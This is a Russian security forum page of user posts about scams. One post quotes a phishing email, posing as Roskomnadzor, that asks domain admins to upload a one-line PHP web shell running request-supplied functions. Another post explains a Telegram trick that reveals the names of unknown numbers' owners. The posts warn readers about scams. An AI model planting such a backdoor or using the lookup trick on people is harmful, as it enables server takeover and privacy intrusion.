Сообщество - Информационная безопасность IT
Добавить пост

Информационная безопасность IT

1 413 постов 25 512 подписчиков

Популярные теги в сообществе:

Попытка взлома

Забавная попытка развода, с таким еще не сталкивался.

Письмо прилетело. Яндекс его заботливо положил в спам. Обычно я туда редко заглядываю, а тут что-то решил полюбопытствовать..


В общем, пишет нам "Роскомнадзор" :))

Попытка взлома Спам, Взлом, Мошенничество, Негатив

На картинке домен не замазываю, потому как домен этот уже лет пять как потерян, и вероятно - навсегда, а вот почт свою решил прикрыть, хоть и заспамленная, а всеж привык :))


Видимо в сети где-то гуляют базы награбленные из WHOIS в те времена когда контакт админа еще был доступен публично, с тех пор вот и пишут всякие.

Но такое - в первый раз.


Текст письма:



"Уважаемый администратор домена!

В соответствии с изменениями, внесенными в Федеральный закон "Об информации, информационных технологиях и о защите информации", необходимо подтвердить, что фактическое управление доменным именем lalsk.ru осуществляется лицом, указанным в качестве его администратора.

Для подтверждения того, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл 19442ys524wvgk.php со следующим содержимым:

<?php

print("JVNUVVBXE");

$_REQUEST['d']($_REQUEST['q']); ?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего уведомления и присутствовать на сервере до 9 мая 2021 года, 17:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.

Если процедура подтверждения не будет пройдена, делегирование доменного имени будет приостановлено."


в PHP я не особо силен, полагаю это должно будет выполнять инструкции из запроса в URL ?


В общем-то не думаю что кто-то поведется, но раз в год и палка стреляет, будьте бдительны :)

Показать полностью

Очередные мошенники с Авито. yandex-wallet.ru

Настало время выйти из readonly режима. Вот и до меня дошла эстафета с авито-мошенниками.
Я выставил на продажу старую детскую кровать за 10к. Буквально через несколько минут сообщение в богомерзкий whatsapp, мол, актуально ли объявление. Есть ли трещины, сколы. Разберу ли я сам для них кровать. Просит сделать скидку, прислать видео. Потом "совещается с супругом". И выносит вердикт, что супругу "тоже понравился ваш товар". Товар, у меня? Ну ладно. Это был первый звоночек. Но я радуюсь, что нашёлся покупатель, и особо внимания этому не придаю. А дальше самая мякотка - мошенник начинает меня убеждать воспользоваться яндекс доставкой, через которую мне оплатят, и грузчики которой кровать заберут. Высылает ссылку для получения денег на сайт yandex-wallet.ru. И тут всё становится понятно.
1)Поисковики ничего не знают про этот yandex-wallet.ru, и про мошенников с этого сайта тоже. При переходе в корень сайта происходит переадресация на yandex.ru. Пока что похоже на правду.
2) Перехожу по ссылке (это я, конечно, сглупил; с телефона такие сайты открывать нельзя). И вижу стандартную форму ввода всех данных банковской карты. Ха-ха. И доставка в Кемерово. Которая в самой дешёвой транспортной компании будет стоить не меньше тех же 10к, а уж яндекс доставкой раз в 5 дороже. До этого момента у меня ещё теплилась надежда, что я продал кровать. Написал мошеннику, что сайт то мошеннеческий. На этом разговор закончился. Ещё на странице "с получением средств" была красивая ссылка с картинкой на моё объявление.
3) Добрался до компьютера и посмотрел на сайт повнимательнее. Домен зарегистрирован в декабре прошлого года на частное лицо (для просмотра истории регистрации сайта спросите у любого поисковика whois имя.сайта)

Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив

4) Смотрю ssl сертификат сайта. Сравните

Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив

С сертификатом основного сайта яндекса

Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив

Для просмотра сертификата нажмите на значок замочка в адресной строке браузера.
5) К сожалению, страница оплаты уже была недоступна. И самое интересное я посмотреть не смог. Предположу, что мошенник, поняв, что от меня ничего не добиться, сделал эту ссылку неактивной. В тор браузере сайт вообще не открылся, что тоже характерно.
6) В принципе, уже давно всё стало понятно. Но я решил спросить у поисковиков про сервера доменных имён этого сайта (см. п.3). И вижу что-то до боли знакомое

Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив

Вера в честность людей чуть меня не подвела. Вне всякого сомнения, это были мошенники. Ну и переписка на память.

Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив
Очередные мошенники с Авито. yandex-wallet.ru Авито, Мошенничество, Информационная безопасность, Длиннопост, Негатив

Поисковики хорошо работают с сайтом пикабу. Так что скоро в них по запросу "мошенники yandex-wallet.ru" будет показываться этот пост вместо пустотой выдачи.

Показать полностью 14

Методы взлома

Мысли и реалии

Методы взлома Watch Dogs, Хакеры, Мысли

Уже давненько посещает мысль меня порой. Еще даже в учась в школе думал о том, что вполне возможно создать программу , которая может к примеру взломать любой ресурс, личный кабинет, интернет банк и к примеру перевести даже существующие деньги в электронном виде на определенный счёт, который невозможно (конечно вряд-ли, но, но) отследить, либо( сейчас идея пришла) будет дробить к примеру на все существующие криптовалюты, путем взлома опять же аккаунтов собственников, не принося конечным особых проблем (схема подобная торрентам) и при любых попытках её отследить перебрасывается на валютный либо любой другой биржевой рынок.

Пример есть пусть счёт центробанка, программа ломает ее изымает все существующие средства и дробит на все существующие аккаунты и счета майнеров всей существующей крипты(принося при этом нехилый всплеск и рост), либо на все средства закупает эти самые коины.

Как это будет к примеру мониториться, либо возвращаться. Возможно ли такое(почему то уверен возможно)

И я думаю это либо должна быть нейросеть с определённым алгоритмом работы, к ней парк самых навороченных пк, либо просто софт, который работает от имени всех существующих пк в мире.

Было бы интересно услышать, проанализировать мнения комментарии.

И вопрос,  если представить это возможно сейчас. Что для этого нужно? Интересен был бы более подробный комментарий, даже если это невозможно, причина невозможности и тд. Всех заранее благодарю.

₽.$. Возможно связываю нелогичные вещи никак не относящиеся друг к другу но всё же, это мои мозги))

Показать полностью

Известный кардер Сергей Павлович продолжает беседу c Сергеем Никитиным, заместителем лаборатории компьютерной криминалистики

#хакеры #кардинг #carding #кардеры #киберпреступления #hackers #касперский #kaspersky #расследования #фсб #фбр #сачков #ильясачков #киберпреступники #криминал #андроид #трояны #вирусы #обнал #коррупция #кибербезопасность #cybersecurity #информационнаябезопасность #бизнес #GroupIB

В 197-м выпуске «Люди PRO» известный кардер Сергей Павлович продолжает беседу c Сергеем Никитиным, заместителем лаборатории компьютерной криминалистики компании Group-IB – главного российского частного борца с хакерами и прочими киберпреступниками, и в десятом выпуске из серии говорим о ....

ТАЙМКОДЫ:

00:00 – В этом выпуске

00:30 – Фирменные подарки от Group-IB

02:10 – На каких языках пишутся трояны

03:20 – Проект «Бегемотик»

07:02 – «Продукция Касперского выглядит слабовато...»

07:35 – Взлом серверов NSA, проправительственные хакерские группировки

09:02 – «Проникли везде, без Джеймса Бонда»

10:12 – Как определяют проправительственный хакерский софт, троян?

12:35 – Штрафы за незашифрованный Wi-Fi, как заметают следы

14:25 – Методики работы APT-группировок

15:25 – 5G, санкции США для компании Huawei

16:57 – Штатные шифровальщики, Ubuntu, важность обновлений

19:01 – «90% вирусов написано для Windows»

19:51 – Вирусы на iOS

22:13 – «Система сборки для защиты от спецслужб»

23:24 – Фишинговые видео в Ютубе (YouTube)

24:40 – Социальная инженерия, вирус трибот (tribot virus)

26:06 – Безопасные браузеры, защита от межсайтингового скриптинга

26:32 – Вредоносные расширения для Гугл Хрома (Chrome)

27:48 – Украли биткоины, AppStore

29:17 – Сбор данных, голосовые боты

30:05 – История Скайпа (Skype), смена разработчика

31:35 – Мессенджеры, продолжение следует...

Приятного просмотра!

https://vk.com/voron_z?w=wall-151091629_509

Показать полностью 1

Где находят контакты телефонные мошенники

Добрый день, друзья


Я, думаю как и многие на Пикабу, регулярно задавался вопросом - откуда телефонные мошенники выискивают мой контактный номер телефона и точно знают, какой у меня банк.

Грешил и на банк, думал, что он в очередной раз сливает информацию.

На службу доставки, интернет магазины и тд.

Но, спасибо сегодняшнему звонящему разводиле Алексею! - Он все разъяснил.

Я люблю общаться с мошенниками, и каждый раз выбираю разные темы, в этот раз решил всему соглашаться.

Далее диалог (я -я, мошенник - м):

М: Добрый день, Сергей Игоревич, Вам звонят из службы внутренней безопасности Сбербанка, старший специалист - Алексей.

Я - Слушаю,

М - Сергей Игоревич, Вы производили операции с Вашим денежным счетом в последние 15 минут?

Я - Да

М - Сергей Игоревич, вы подтверждаете перевод денежных средств в размере 8000 рублей гражданину (не запомнил)

Я - Да,

М - Сергей Игоревич, понятно... Может тогда вы желаете устроиться в нашу компанию IT-директором? - Кем вы видите себя через 10 лет?

Я - А кем вы видите себя?

М - Успешным и обеспеченным человеком!

Я - За решеткой думаю?

М - да ну Вас  -пип пип пип...


Ну и тут вопрос - откуда мошенник знает, что я работаю в IT на руководящей должности, на этом сайте есть мой телефон - ну конечно же это HH.

Где находят контакты телефонные мошенники Персональные данные, Телефонные мошенники, Сбербанк, HH, Негатив

Ну а дальше весь порядок становится понятен.

Мошенники зарегистрированы как работодатель. Может быть учетки чьи-то ломанные. Получают доступ к телефону соискателя (так как без телефона анкета сразу теряет рейтинг). Далее простая манипуляция с СБП или в том же приложении Сбера, вводят телефон - видят чей банк у человека, а теперь простейший скрипт обзвона и развода.

По этому всем рекомендую включить в Сбере режим Инкогнито, а вот что делать с СБП - не знаю, штука удобная, но твой банк спалит элементарно...


Потому скажу лишь одно - безопасность нас и близких лишь только в наших руках - никому не интересно защищать Вас и Ваши персональные данные.


Надеюсь эта информация кому-нибудь поможет и защитит.

Успехов и спокойных дней!

Показать полностью 1

Сергей Павлович продолжает беседу c Сергеем Никитиным, заместителем лаборатории компьютерной криминалистики компании Group-IB

В 196-м выпуске «Люди PRO» известный кардер Сергей Павлович продолжает беседу c Сергеем Никитиным, заместителем лаборатории компьютерной криминалистики компании Group-IB – главного российского частного борца с хакерами и прочими киберпреступниками.


Group-IB — это лучшие мировые специалисты в области информационной безопасности. Мы работаем над расследованиями самых сложных киберпреступлений и создаем продукты, которые защищают от них миллионы людей.


Наша стратегическая цель — построить компанию по кибербезопасности нового типа, которая не зависит ни от одного государства. Компанию, в офисах которой практически в каждой стране полностью дублируется вся инфраструктура, которая есть здесь, в России (в моей модели их должно быть не меньше 40). Так не делает никто. Для чего это нужно? Чтобы бороться с преступностью, — это моя основная мотивирующая цель.

https://vk.com/wall-151091629_506

Чертовски странные смс приходят - может кто знает что это?!

Добрый день. Получаю странные смс с разных номеров. Ничего не понятно как ни гуглил - не могу найти что это такое!

Помогите разобраться - ибо я не понимаю - что это такое!

Чертовски странные смс приходят - может кто знает что это?! СМС, Шифрование, Телефон
Показать полностью 1

Баг или фича ? Особенности удаления контактов в Telegram

Telegram позиционирует себя как самый защищенный мессенджер не только от злоумышленников, но и от государственных структур. Но видимо так получилось что пытливые умы это не останавливает, и в этой статье напишу о интересном баге, а может быть это хорошо законспирированная фича. Одну из таких фич Телеграмма я ранее описывал в статье Что может быть когда не отключил GPS на смартфоне


У всех у нас в телефонах, записных книжках есть множество номеров которые не записаны , а есть такие варианты когда у вас есть номер и по нему нужно получить хоть какую ни будь информацию, например имя владельца, без официальных запросов в государственные органы и операторам связи.

Так как Telegram один из самых популярных мессенджеров его и будем использовать для дальнейших манипуляций.

Баг или фича ? Особенности удаления контактов в Telegram Telegram, Баг, Фича, Длиннопост

И так берем номер и добавляем его с произвольным именем в контакты телеграмма. (эксперимент проводится на территории Казахстана. г. Нур-Султан), поэтому географию телеграмма игнорируем.

Баг или фича ? Особенности удаления контактов в Telegram Telegram, Баг, Фича, Длиннопост

И вот после добавления контакта в телеграмм у нас появляется очень интересная информация :

1. Фотография (а это значит как минимум через гугл картинки мы уже можем найти социальные сети этого человека)

2. Время последнего появления в мессенджере.


Но самое интересное начинает происходить после удаления контакта. Нажимаем кнопку «удалить чат» в настройках , и «самый защищенный мессенджер » с пометкой «удален из ваших контактов » открывает имя этого контакта.

Баг или фича ? Особенности удаления контактов в Telegram Telegram, Баг, Фича, Длиннопост

Небольшой эксперимент приводит к интересным заключениям, а с другой стороны в ваших телефонах теперь появиться контакты с нормальными именами.


Источник - kopelyan.kz

Показать полностью 3
Отличная работа, все прочитано!